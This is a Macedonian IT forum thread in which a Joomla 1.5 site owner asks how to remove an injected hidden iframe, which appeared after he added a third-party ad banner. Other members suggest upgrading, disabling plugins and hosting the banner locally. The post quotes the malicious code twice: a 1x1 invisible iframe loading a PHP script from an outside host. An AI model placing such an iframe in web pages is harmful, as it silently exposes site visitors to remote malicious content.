• Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.

Joomla iframe attact

  • Ја почнал/а темата
  • #1

Кристијан Про

Gaining Experience
5 октомври 2012
857
143
<iframe src="http://pazoaws.ftp1.biz/ip/stat.php" width=1 height=1 style="visibility: hidden"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="mk-mk" lang="mk-mk" >

како што гласи насловот имам атакт на Joomla iframe <iframe src="http://pazoaws.ftp1.biz/ip/stat.php" width=1 height=1 style="visibility: hidden"></iframe> некој предлог како да го избришам и како да го решам тоа
 

FATAL ERROR !

Баниран/a
24 август 2011
579
270
Надогради ја joomla верзијата, не би требало ова да е проблем, или пак изгасиги сите додатоци (плагини) што ги имаш ставено па види дали пак ќе е така, па полека вклучувај еден по еден.
 
  • Ја почнал/а темата
  • #3

Кристијан Про

Gaining Experience
5 октомври 2012
857
143
Моментално користам Joomla 1.5, значи се си беше океј се додека не ставив еден рекламен банер од една фирма.... И после тоа се појави ова, односно антивирусната ми се активира само на Мозила и на Интернет Explorer а додека на Хром не се активира
 

FATAL ERROR !

Баниран/a
24 август 2011
579
270
Снимај си ја сликата од банерот на твојот хост и пробај така да го додадеш банерот...
 

Нови мислења

Последни Теми

Статистика

Теми
43,743
Мислења
856,577
Членови
29,747
Најнов член
Mitra1987
На врв Дно